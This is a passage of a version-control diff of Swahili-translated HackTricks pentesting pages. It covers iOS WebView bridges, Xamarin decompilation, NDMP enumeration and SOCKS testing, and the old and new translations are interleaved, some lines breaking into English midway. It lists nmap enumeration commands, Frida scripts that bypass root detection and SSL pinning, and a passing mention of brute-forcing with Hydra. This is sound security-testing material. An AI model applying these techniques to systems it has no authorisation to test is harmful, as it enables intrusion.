// Alternative method for calling exposed JavaScript functions
document.location = "javascriptbridge://addNumbers/" + 1 + "/" + 2
```
Kwa kuchukua na kubadilisha matokeo ya wito wa kazi ya asili, mtu anaweza kubadilisha kazi ya kurejesha ndani ya HTML:
Ili kukamata na kubadilisha matokeo ya wito wa kazi asilia, mtu anaweza kubadilisha kazi ya kurudi ndani ya HTML:
```html
<html>
<script>
@ -239,7 +240,7 @@ alert(result);
</script>
</html>
```
Upande wa asili unashughulikia wito wa JavaScript kama inavyoonyeshwa katika darasa la `JavaScriptBridgeMessageHandler`, ambapo matokeo ya operesheni kama vile kuzidisha nambari yanapangwa na kutumwa tena kwa JavaScript ili kuonyeshwa au kufanyiwa mabadiliko zaidi:
Sehemu ya asili inashughulikia wito wa JavaScript kama inavyoonyeshwa katika darasa la `JavaScriptBridgeMessageHandler`, ambapo matokeo ya operesheni kama vile kuzidisha nambari yanashughulikiwa na kutumwa nyuma kwa JavaScript kwa ajili ya kuonyeshwa au usindikaji zaidi:
```swift
class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler {
// Handling "multiplyNumbers" operation
@ -252,40 +253,41 @@ let javaScriptCallBack = "javascriptBridgeCallBack('\(functionFromJS)','\(result
message.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil)
}
```
## Kurekebisha Mipangilio ya iOS WebViews
## Debugging iOS WebViews
(Mafunzo yaliyojikita kwenye [https://blog.vuplex.com/debugging-webviews](https://blog.vuplex.com/debugging-webviews))
(Tutorial based on the one from [https://blog.vuplex.com/debugging-webviews](https://blog.vuplex.com/debugging-webviews))
Ili kurekebisha maudhui ya wavuti kwa ufanisi ndani ya iOS webviews, mazingira maalum yanahitajika ambayo yanahusisha zana za maendeleo za Safari kutokana na ukweli kwamba ujumbe uliotumwa kwa `console.log()` haionyeshwi kwenye magogo ya Xcode. Hapa kuna mwongozo rahisi, ukiangazia hatua muhimu na mahitaji:
Ili kufanikisha ufuatiliaji wa maudhui ya wavuti ndani ya iOS webviews, inahitajika mipangilio maalum inayohusisha zana za maendeleo za Safari kwa sababu ujumbe unaotumwa kwa `console.log()` hauonyeshwi katika kumbukumbu za Xcode. Hapa kuna mwongozo rahisi, ukisisitiza hatua na mahitaji muhimu:
- **Maandalizi kwenye Kifaa cha iOS**: Safari Web Inspector inahitaji kuwezeshwa kwenye kifaa chako cha iOS. Hii inafanywa kwa kwenda kwenye **Mipangilio > Safari > Advanced**, na kuwezesha _Web Inspector_.
- **Maandalizi kwenye Kifaa cha iOS**: Mchunguzi wa Wavuti wa Safari unahitaji kuwezeshwa kwenye kifaa chako cha iOS. Hii inafanywa kwa kwenda **Settings > Safari > Advanced**, na kuwezesha _Web Inspector_.
- **Maandalizi kwenye Kifaa cha macOS**: Kwenye kompyuta yako ya maendeleo ya macOS, lazima uwezeshe zana za maendeleo ndani ya Safari. Anza Safari, nenda **Safari > Mapendeleo > Advanced**, na chagua chaguo la _Onyesha menyu ya Maendeleo_.
- **Maandalizi kwenye Kifaa cha macOS**: Kwenye mashine yako ya maendeleo ya macOS, lazima uwezeshe zana za maendeleo ndani ya Safari. Fungua Safari, upate **Safari > Preferences > Advanced**, na chagua chaguo la _Show Develop menu_.
- **Unganisho na Kurekebisha**: Baada ya kuunganisha kifaa chako cha iOS kwenye kompyuta yako ya macOS na kuzindua programu yako, tumia Safari kwenye kifaa chako cha macOS kuchagua webview unayotaka kurekebisha. Nenda kwenye _Develop_ kwenye menyu ya Safari, weka kipanya juu ya jina la kifaa chako cha iOS ili kuona orodha ya mifano ya webview, na chagua mfano unayotaka kukagua. Dirisha jipya la Safari Web Inspector litafunguka kwa kusudi hili.
- **Muunganisho na Ufuatiliaji**: Baada ya kuunganisha kifaa chako cha iOS na kompyuta yako ya macOS na kuzindua programu yako, tumia Safari kwenye kifaa chako cha macOS kuchagua webview unayotaka kufuatilia. Tembea hadi _Develop_ kwenye menyu ya Safari, piga juu ya jina la kifaa chako cha iOS ili kuona orodha ya matukio ya webview, na chagua tukio unalotaka kukagua. Dirisha jipya la Mchunguzi wa Wavuti wa Safari litafunguliwa kwa ajili ya hili.
Hata hivyo, kuwa mwangalifu kuhusu vikwazo:
Hata hivyo, kuwa makini na mipaka:
- Kurekebisha kwa njia hii kunahitaji kifaa cha macOS kwani inategemea Safari.
- Webviews tu katika programu zilizopakiwa kwenye kifaa chako kupitia Xcode zinastahili kurekebishwa. Webviews katika programu zilizosakinishwa kupitia Duka la App au Apple Configurator haziwezi kurekebishwa kwa njia hii.
- Ufuatiliaji kwa njia hii unahitaji kifaa cha macOS kwani inategemea Safari.
- Ni webviews pekee katika programu zilizopakiwa kwenye kifaa chako kupitia Xcode zinazostahili kufuatiliwa. Webviews katika programu zilizowekwa kupitia Duka la Programu au Mkononi wa Apple cannot be debugged in this manner.
## Marejeo
## References
* [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6)
* [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS)
* [https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

80
mobile-pentesting/xamarin-apps.md
View file

@ -1,82 +1,84 @@
# Programu za Xamarin
# Xamarin Apps
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Hii ni muhtasari wa chapisho la blogu [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
Hii ni muhtasari wa chapisho la blog [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
## **Taarifa Msingi**
## **Basic Information**
Xamarin ni **jukwaa huria** lililoundwa kwa watengenezaji kuunda programu za iOS, Android, na Windows kwa kutumia fremu za .NET na C#. Jukwaa hili linafikia zana nyingi na nyongeza za kuunda programu za kisasa kwa ufanisi.
Xamarin ni **jukwaa la chanzo wazi** lililoundwa kwa ajili ya waendelezaji **kuunda programu za iOS, Android, na Windows** kwa kutumia .NET na C# frameworks. Jukwaa hili linatoa ufikiaji wa zana nyingi na nyongeza za kuunda programu za kisasa kwa ufanisi.
### Usanifu wa Xamarin
### Xamarin's Architecture
- Kwa **Android**, Xamarin inaunganisha na majina ya Android na Java kupitia vifurushi vya .NET, ikifanya kazi ndani ya mazingira ya utekelezaji ya Mono pamoja na Android Runtime (ART). Vifurushi vya Kuita vilivyosimamiwa (MCW) na Vifurushi vya Kuita vya Android (ACW) hufanikisha mawasiliano kati ya Mono na ART, ambayo yote yamejengwa kwenye kernel ya Linux.
- Kwa **iOS**, programu zinaendeshwa chini ya utekelezaji wa Mono, ikichanganya uongofu kamili wa Mbele ya Wakati (AOT) kuwa lugha ya usanifu ya ARM kutoka kwa nambari ya C# .NET. Mchakato huu unaendesha pamoja na Utekelezaji wa Objective-C kwenye kernel kama ya UNIX.
- Kwa **Android**, Xamarin inajumuisha na Android na Java namespaces kupitia .NET bindings, ikifanya kazi ndani ya mazingira ya utekelezaji ya Mono pamoja na Android Runtime (ART). Managed Callable Wrappers (MCW) na Android Callable Wrappers (ACW) hurahisisha mawasiliano kati ya Mono na ART, zote zikiwa zimejengwa kwenye kernel ya Linux.
- Kwa **iOS**, programu zinafanya kazi chini ya Mono runtime, zikitumika kamili Ahead of Time (AOT) compilation kubadilisha C# .NET code kuwa lugha ya mkusanyiko wa ARM. Mchakato huu unafanya kazi pamoja na Objective-C Runtime kwenye kernel inayofanana na UNIX.
### .NET Runtime na Mono Framework
### .NET Runtime and Mono Framework
**Fremu ya .NET** inajumuisha vifurushi, darasa, na majina ya nafasi za maendeleo ya programu, na .NET Runtime inasimamia utekelezaji wa nambari. Inatoa uhuru wa jukwaa na utangamano wa nyuma. **Mono Framework** ni toleo huria la fremu ya .NET, ilianzishwa mwaka 2005 kuongeza .NET kwa Linux, sasa inayoungwa mkono na Microsoft na inayoongozwa na Xamarin.
**.NET framework** inajumuisha assemblies, classes, na namespaces kwa ajili ya maendeleo ya programu, huku .NET Runtime ikisimamia utekelezaji wa msimbo. Inatoa uhuru wa jukwaa na ulinganifu wa nyuma. **Mono Framework** ni toleo la chanzo wazi la .NET framework, lililoanzishwa mwaka 2005 ili kupanua .NET kwa Linux, sasa linaungwa mkono na Microsoft na kuongozwa na Xamarin.
### Kudukua Programu za Xamarin
### Reverse Engineering Xamarin Apps
#### Kudondoa Kificho cha Kukusanywa cha Xamarin
#### Decompilation of Xamarin Assemblies
Kudondoa kificho cha kukusanywa hubadilisha kificho kilichokusanywa kuwa kificho cha chanzo. Katika Windows, dirisha la Moduli katika Visual Studio linaweza kutambua moduli za kudondoa, kuruhusu upatikanaji wa moja kwa moja wa nambari ya chanzo ya mtu wa tatu na uchimbaji wa kificho cha chanzo kwa uchambuzi.
Decompilation inabadilisha msimbo ulioandikwa nyuma kuwa msimbo wa chanzo. Katika Windows, dirisha la Modules katika Visual Studio linaweza kutambua moduli za decompilation, kuruhusu ufikiaji wa moja kwa moja wa msimbo wa wahusika wengine na kutoa msimbo wa chanzo kwa ajili ya uchambuzi.
#### Kompilisheni ya JIT vs AOT
#### JIT vs AOT Compilation
- **Android** inasaidia Kompilisheni ya Mara tu-Inapo (JIT) na Kompilisheni ya Mbele ya Wakati (AOT), na hali ya Hybrid AOT kwa kasi bora ya utekelezaji. AOT kamili inapatikana tu kwa leseni za Enterprise.
- **iOS** inatumia tu Kompilisheni ya AOT kutokana na vizuizi vya Apple kwenye utekelezaji wa nambari ya kudumu.
- **Android** inasaidia Just-In-Time (JIT) na Ahead-Of-Time (AOT) compilation, ikiwa na hali ya Hybrid AOT kwa ajili ya kasi bora ya utekelezaji. AOT kamili ni ya leseni za Enterprise pekee.
- **iOS** inatumia tu AOT compilation kutokana na vizuizi vya Apple juu ya utekelezaji wa msimbo wa dynamic.
### Kuchimbua Faili za dll kutoka APK/IPA
### Extracting dll Files from APK/IPA
Ili kupata vifurushi katika APK/IPA, fungua faili na tafuta saraka za vifurushi. Kwa Android, zana kama [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) na [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress) zinaweza kufungua faili za dll.
Ili kufikia assemblies katika APK/IPA, fungua faili na uchunguze saraka ya assemblies. Kwa Android, zana kama [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) na [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress) zinaweza kufungua faili za dll.
```bash
python3 xamarin-decompress.py -o /path/to/decompressed/apk
```
Kwa blobs za mkutano katika Android, [pyxamstore](https://github.com/jakev/pyxamstore) inaweza kuzifungua.
Kwa assembly blobs katika Android, [pyxamstore](https://github.com/jakev/pyxamstore) inaweza kuyafungua.
```bash
pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
```
Faili za dll za iOS zinapatikana kwa urahisi kwa decompilation, zikifunua sehemu kubwa ya nambari ya programu, ambayo mara nyingi inashiriki msingi wa kawaida kati ya jukwaa tofauti.
iOS dll files zinapatikana kwa urahisi kwa ajili ya decompilation, zikifunua sehemu kubwa za msimbo wa programu, ambayo mara nyingi inashiriki msingi wa kawaida katika majukwaa tofauti.
### Uchambuzi wa Kudumu
### Uchambuzi wa Kijadi
Uchambuzi wa kudumu unahusisha ukaguzi wa SSL pinning na matumizi ya zana kama [Fridax](https://github.com/NorthwaveSecurity/fridax) kwa marekebisho ya wakati wa kukimbia ya .NET binary katika programu za Xamarin. Skrini za Frida zinapatikana kwa kuzidisha ugunduzi wa root au SSL pinning, kuongeza uwezo wa uchambuzi.
Uchambuzi wa kijadi unahusisha kuangalia kwa SSL pinning na kutumia zana kama [Fridax](https://github.com/NorthwaveSecurity/fridax) kwa mabadiliko ya wakati wa kukimbia ya .NET binary katika programu za Xamarin. Skripti za Frida zinapatikana ili kupita ugunduzi wa root au SSL pinning, zikiongeza uwezo wa uchambuzi.
Skrini nyingine za Frida za kuvutia:
Skripti nyingine za Frida zinazovutia:
* [**xamarin-antiroot**](https://codeshare.frida.re/@Gand3lf/xamarin-antiroot/)
* [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/)
* [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin)
## Taarifa Zaidi
## Taarifa zaidi
* [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
* [https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/](https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

42
network-services-pentesting/10000-network-data-management-protocol-ndmp.md
View file

@ -1,30 +1,31 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# **Taarifa za Itifaki**
# **Taarifa ya Protokali**
Kutoka [Wikipedia](https://en.wikipedia.org/wiki/NDMP):
> **NDMP**, au **Network Data Management Protocol**, ni itifaki inayolenga kusafirisha data kati ya vifaa vya uhifadhi vilivyounganishwa kwenye mtandao \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) na vifaa vya kuhifadhi nakala. Hii inaondoa haja ya kusafirisha data kupitia seva ya kuhifadhi nakala yenyewe, hivyo kuongeza kasi na kuondoa mzigo kwenye seva ya kuhifadhi nakala.
> **NDMP**, au **Protokali ya Usimamizi wa Takwimu za Mtandao**, ni protokali iliyokusudiwa kubeba data kati ya vifaa vya uhifadhi vilivyounganishwa kwenye mtandao \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) na vifaa vya [backup](https://en.wikipedia.org/wiki/Backup). Hii inondoa hitaji la kubeba data kupitia seva ya backup yenyewe, hivyo kuongeza kasi na kuondoa mzigo kutoka kwa seva ya backup.
**Bandari ya chaguo-msingi:** 10000
**Bandari ya kawaida:** 10000
```text
PORT STATE SERVICE REASON VERSION
10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp
```
# **Uthibitishaji**
# **Uhesabu**
```bash
nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 <IP> #Both are default scripts
```
@ -34,16 +35,17 @@ nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 <IP> #Both are defa
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

118
network-services-pentesting/1080-pentesting-socks.md
View file

@ -1,94 +1,43 @@
# 1080 - Kupima Usalama wa Socks
# 1080 - Pentesting Socks
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
**SOCKS** ni itifaki inayotumiwa kwa kuhamisha data kati ya mteja na seva kupitia proksi. Toleo la tano, **SOCKS5**, linaongeza kipengele cha uwakiki kinachoruhusu watumiaji waliothibitishwa tu kupata seva. Inashughulikia hasa kupeleka uhusiano wa TCP na kuhamisha pakiti za UDP, ikifanya kazi kwenye safu ya kikao (Safu ya 5) ya mfano wa OSI.
**SOCKS** ni protokali inayotumika kwa ajili ya kuhamasisha data kati ya mteja na seva kupitia proxy. Toleo la tano, **SOCKS5**, linaongeza kipengele cha uthibitishaji ambacho ni hiari, kinachoruhusu watumiaji walioidhinishwa pekee kufikia seva. Kimsingi inashughulikia proxying ya muunganisho wa TCP na kupeleka pakiti za UDP, ikifanya kazi katika safu ya kikao (Layer 5) ya mfano wa OSI.
**Bandari ya Chaguo-msingi:** 1080
**Default Port:** 1080
## Uchunguzi
## Enumeration
### Ukaguzi wa Uthibitishaji
### Authentication Check
```bash
nmap -p 1080 <ip> --script socks-auth-info
```
#### Matumizi ya Msukumo wa Nguvu
### Brute Force
##### Matumizi ya Msingi
Kutumia msukumo wa nguvu ni njia ya kawaida ya kuvunja nywila. Kwa kufanya jaribio la msukumo wa nguvu, unaweza kujaribu nywila tofauti kwa kuingiza moja kwa moja kwenye mfumo unaolindwa. Hii inaweza kufanyika kwa kutumia programu maalum za msukumo wa nguvu kama Hydra au Medusa.
Kwa mfano, unaweza kutumia Hydra kwa kufanya jaribio la msukumo wa nguvu kwenye seva ya SSH. Unaweza kuanzisha jaribio hili kwa kutoa orodha ya nywila zinazowezekana na jina la mtumiaji. Hydra basi itajaribu kila nywila kwenye orodha hadi itapata ile sahihi.
